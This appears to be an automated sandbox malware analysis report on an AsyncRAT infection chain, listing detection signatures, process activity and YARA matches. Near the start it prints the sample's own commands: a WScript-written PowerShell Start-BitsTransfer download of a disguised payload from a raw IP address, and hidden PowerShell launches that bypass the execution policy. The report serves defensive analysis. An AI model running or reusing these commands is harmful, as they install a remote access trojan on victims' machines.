              Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: WScript.Shell");IFileSystem3.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", "true");ITextStream.Write("<command> <a> <execute>Start-BitsTransfer -Source "http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg" -Destination "C:\Users\Public\sNGobbjhXGKsSanr.zip"; Expand-Archive -Path "C:\Users\Public\sNGobbjhXGKsSanr");ITextStream.Close();IHost.CreateObject("WScript.Shell");IFileSystem3.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", "true");ITextStream.Write("<command> <a> <execute>Start-BitsTransfer -Source "http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg" -Destination "C:\Users\Public\sNGobbjhXGKsSanr.zip"; Expand-Archive -Path "C:\Users\Public\sNGobbjhXGKsSanr");ITextStream.Close();IWshShell3.Run("powershell -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEY", "0", "true");IHost.CreateObject("WScript.Shell");IFileSystem3.CreateTextFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml", "true");ITextStream.Write("<command> <a> <execute>Start-BitsTransfer -Source "http://212.23.222.200:222/DuXgEWeDmEQIPXmX/LetsTryThisShot.jpg" -Destination "C:\Users\Public\sNGobbjhXGKsSanr.zip"; Expand-Archive -Path "C:\Users\Public\sNGobbjhXGKsSanr");ITextStream.Close();IWshShell3.Run("powershell -command "[xml]$xmldoc = Get-Content 'C:\Users\Public\NDKJPlEEY", "0", "true");IFileSystem3.DeleteFile("C:\Users\Public\NDKJPlEEYLhKqtGW.xml")
              .NET source code contains method to dynamically call methods (often used by packers)
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, EwV3ECxYhIse1SOarW.cs.Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777303)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777243)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777256))})
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, EwV3ECxYhIse1SOarW.cs.Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777303)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777243)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777256))})
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, EwV3ECxYhIse1SOarW.cs.Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777303)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777243)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777256))})
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, EwV3ECxYhIse1SOarW.cs.Net Code: Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777303)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777243)),Type.GetTypeFromHandle(Kp3eZNOyNqfl614RmD.WRElmpEq5x(16777256))})
              .NET source code contains potential unpacker
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, RamIajDijoDSEGPN.cs.Net Code: gZXYCCeUKhWbCK System.AppDomain.Load(byte[])
              Source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, AssemblyLoader.cs.Net Code: ReadFromEmbeddedResources System.Reflection.Assembly.Load(byte[])
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, RamIajDijoDSEGPN.cs.Net Code: gZXYCCeUKhWbCK System.AppDomain.Load(byte[])
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, RamIajDijoDSEGPN.cs.Net Code: gZXYCCeUKhWbCK System.AppDomain.Load(byte[])
              Suspicious powershell command line found
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\DnWEdFPemZvdtKRs.ps1'"Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -NoProfile -WindowStyle Hidden -ExecutionPolicy Bypass -Command "& 'C:\Users\Public\newrdptry.ps1'"
              Yara detected Costura Assembly Loader
              Source: Yara matchFile source: 22.2.RegSvcs.exe.3f95168.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.7230000.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.7230000.1.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 22.2.RegSvcs.exe.3f95168.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000016.00000002.4652798052.0000000007230000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.4588985602.0000000003DB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.4536701610.0000000002D8A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348B991E push esp; retf 3_2_00007FFD348B991F
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD348BBB9E pushfd ; ret 3_2_00007FFD348BBBC1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD3497598A push eax; retf 3_2_00007FFD3497598B
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFD349792C0 pushfd ; ret 3_2_00007FFD349792C1
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 12_2_00007FFD3489739D push E85ADE1Eh; ret 12_2_00007FFD348973F9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD34894849 push eax; retf 5F53h20_2_00007FFD3489485D
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD34892AF3 pushad ; retf 20_2_00007FFD34892AF9
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 20_2_00007FFD348923FB pushad ; iretd 20_2_00007FFD34892421
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072B25B4 push FFFFFF8Bh; iretd 22_2_072B25B6
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072B24AF push FFFFFF8Bh; iretd 22_2_072B24B1
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072B23AA push FFFFFF8Bh; iretd 22_2_072B23AC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072B2210 push FFFFFF8Bh; retf 22_2_072B2212
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072B22C8 push FFFFFF8Bh; retf 22_2_072B22CA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072B1CB2 push FFFFFF8Bh; retf 22_2_072B1CB4
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_072B1BC4 push FFFFFF8Bh; iretd 22_2_072B1BDC
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_07350718 push esp; ret 22_2_07350831
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_07353AD7 push ebx; retf 22_2_07353ADA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 22_2_07372CA2 push eax; ret 22_2_07372CA3
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, EwV3ECxYhIse1SOarW.csHigh entropy of concatenated method names: 'povJbbMeBQ1HuldviIn', 'qswjRaMYluSgR76kWCL', 'BPTavEfPI8', 'kbPd14MCRB27Dhk81Z6', 'HmYhFyM7c3K15Dc01Lc', 'bPXCtBMGeGULkX840K9', 'hFZJFYMor97b2wGxaQh', 'v9ofblM11J4vp0Mn8bn', 'OuYApxMUEGyKBPgQEYp', 'mfuKEpM4IYMuGTqtP3O'
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, Native.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'qTCV5ohwRfg0smNK1Ev', 'UV8oBXhY312OZZnJbTW', 't0wcpehDdybbXs45srt', 'wvylwNhidoPYHp4POq4', 'aWI3nUhCAcSnB16692G', 'MVIcgwh7SFhi7dRiBeb'
              Source: 20.2.powershell.exe.13852e70000.2.raw.unpack, PE.csHigh entropy of concatenated method names: 'Execute', 'aUwo50hUecWvihYFuRh', 'UGjiv9h4L874My35QOu', 'OXMIfhhmQiHothnrxvy', 'Q7b43Lh6o8WtBh27AGO', 's3ldPnhyA8viKSYG0i6', 'GKtuHBhH4LdB68VstmM', 'qyW5ZmhowYqvOe0df2L', 'GeLfPMh1SY45MWek26P', 'H3pmpDhJDwPbsboIDIc'
              Source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, CbzIJlGmnEw.csHigh entropy of concatenated method names: 'ukLVYKemDXMRrM', 'etJPQFXdCyl', 'VoxCNFCkGvCF', 'zANTvwYVCPbVN', 'fxzWByngzG', 'lkkCdJQdjfnB', 'cvAuXOxJsDBh', 'HVGJEyOonnBEH', 'aoULTRkGAXpTdAZm', 'bqAYdndFwROTXQNY'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, EwV3ECxYhIse1SOarW.csHigh entropy of concatenated method names: 'povJbbMeBQ1HuldviIn', 'qswjRaMYluSgR76kWCL', 'BPTavEfPI8', 'kbPd14MCRB27Dhk81Z6', 'HmYhFyM7c3K15Dc01Lc', 'bPXCtBMGeGULkX840K9', 'hFZJFYMor97b2wGxaQh', 'v9ofblM11J4vp0Mn8bn', 'OuYApxMUEGyKBPgQEYp', 'mfuKEpM4IYMuGTqtP3O'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, Native.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'qTCV5ohwRfg0smNK1Ev', 'UV8oBXhY312OZZnJbTW', 't0wcpehDdybbXs45srt', 'wvylwNhidoPYHp4POq4', 'aWI3nUhCAcSnB16692G', 'MVIcgwh7SFhi7dRiBeb'
              Source: 20.2.powershell.exe.1384aa71a78.1.raw.unpack, PE.csHigh entropy of concatenated method names: 'Execute', 'aUwo50hUecWvihYFuRh', 'UGjiv9h4L874My35QOu', 'OXMIfhhmQiHothnrxvy', 'Q7b43Lh6o8WtBh27AGO', 's3ldPnhyA8viKSYG0i6', 'GKtuHBhH4LdB68VstmM', 'qyW5ZmhowYqvOe0df2L', 'GeLfPMh1SY45MWek26P', 'H3pmpDhJDwPbsboIDIc'
              Source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, CbzIJlGmnEw.csHigh entropy of concatenated method names: 'ukLVYKemDXMRrM', 'etJPQFXdCyl', 'VoxCNFCkGvCF', 'zANTvwYVCPbVN', 'fxzWByngzG', 'lkkCdJQdjfnB', 'cvAuXOxJsDBh', 'HVGJEyOonnBEH', 'aoULTRkGAXpTdAZm', 'bqAYdndFwROTXQNY'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, EwV3ECxYhIse1SOarW.csHigh entropy of concatenated method names: 'povJbbMeBQ1HuldviIn', 'qswjRaMYluSgR76kWCL', 'BPTavEfPI8', 'kbPd14MCRB27Dhk81Z6', 'HmYhFyM7c3K15Dc01Lc', 'bPXCtBMGeGULkX840K9', 'hFZJFYMor97b2wGxaQh', 'v9ofblM11J4vp0Mn8bn', 'OuYApxMUEGyKBPgQEYp', 'mfuKEpM4IYMuGTqtP3O'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, Native.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'qTCV5ohwRfg0smNK1Ev', 'UV8oBXhY312OZZnJbTW', 't0wcpehDdybbXs45srt', 'wvylwNhidoPYHp4POq4', 'aWI3nUhCAcSnB16692G', 'MVIcgwh7SFhi7dRiBeb'
              Source: 30.2.powershell.exe.2d9107309c8.1.raw.unpack, PE.csHigh entropy of concatenated method names: 'Execute', 'aUwo50hUecWvihYFuRh', 'UGjiv9h4L874My35QOu', 'OXMIfhhmQiHothnrxvy', 'Q7b43Lh6o8WtBh27AGO', 's3ldPnhyA8viKSYG0i6', 'GKtuHBhH4LdB68VstmM', 'qyW5ZmhowYqvOe0df2L', 'GeLfPMh1SY45MWek26P', 'H3pmpDhJDwPbsboIDIc'
              Source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, CbzIJlGmnEw.csHigh entropy of concatenated method names: 'ukLVYKemDXMRrM', 'etJPQFXdCyl', 'VoxCNFCkGvCF', 'zANTvwYVCPbVN', 'fxzWByngzG', 'lkkCdJQdjfnB', 'cvAuXOxJsDBh', 'HVGJEyOonnBEH', 'aoULTRkGAXpTdAZm', 'bqAYdndFwROTXQNY'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, EwV3ECxYhIse1SOarW.csHigh entropy of concatenated method names: 'povJbbMeBQ1HuldviIn', 'qswjRaMYluSgR76kWCL', 'BPTavEfPI8', 'kbPd14MCRB27Dhk81Z6', 'HmYhFyM7c3K15Dc01Lc', 'bPXCtBMGeGULkX840K9', 'hFZJFYMor97b2wGxaQh', 'v9ofblM11J4vp0Mn8bn', 'OuYApxMUEGyKBPgQEYp', 'mfuKEpM4IYMuGTqtP3O'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, Native.csHigh entropy of concatenated method names: 'LoadLibraryA', 'GetProcAddress', 'LoadApi', 'qTCV5ohwRfg0smNK1Ev', 'UV8oBXhY312OZZnJbTW', 't0wcpehDdybbXs45srt', 'wvylwNhidoPYHp4POq4', 'aWI3nUhCAcSnB16692G', 'MVIcgwh7SFhi7dRiBeb'
              Source: 38.2.powershell.exe.2b31f7adac0.1.raw.unpack, PE.csHigh entropy of concatenated method names: 'Execute', 'aUwo50hUecWvihYFuRh', 'UGjiv9h4L874My35QOu', 'OXMIfhhmQiHothnrxvy', 'Q7b43Lh6o8WtBh27AGO', 's3ldPnhyA8viKSYG0i6', 'GKtuHBhH4LdB68VstmM', 'qyW5ZmhowYqvOe0df2L', 'GeLfPMh1SY45MWek26P', 'H3pmpDhJDwPbsboIDIc'

              Persistence and Installation Behavior

              barindex
              Powershell uses Background Intelligent Transfer Service (BITS)
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: \KnownDlls\BitsProxy.dllJump to behavior

              Boot Survival

              barindex
              Yara detected AsyncRAT
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 31.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 20.2.powershell.exe.1383ae82fd0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 30.2.powershell.exe.2d900422b00.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 38.2.powershell.exe.2b30f4a3068.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000026.00000002.3969619854.000002B3112DC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000016.00000002.4536701610.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2326561613.000001383AC82000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2739422188.000002D902967000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000026.00000002.3969619854.000002B30F2A2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001F.00000002.2795042318.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000014.00000002.2326561613.000001383C17F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000001E.00000002.2739422188.000002D9002B2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 4156, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 3816, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7092, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 5040, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3492, type: MEMORYSTR

              Hooking and other Techniques for Hiding and Protection

              barindex
              Uses known network protocols on non-standard ports
              Source: unknownNetwork traffic detected: HTTP traffic on port 49699 -> 222
              Source: unknownNetwork traffic detected: HTTP traffic on port 222 -> 49699
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 222
              Source: unknownNetwork traffic detected: HTTP traffic on port 222 -> 49703
              Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 222
              Source: unknownNetwork traffic detected: HTTP traffic on port 222 -> 49703
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
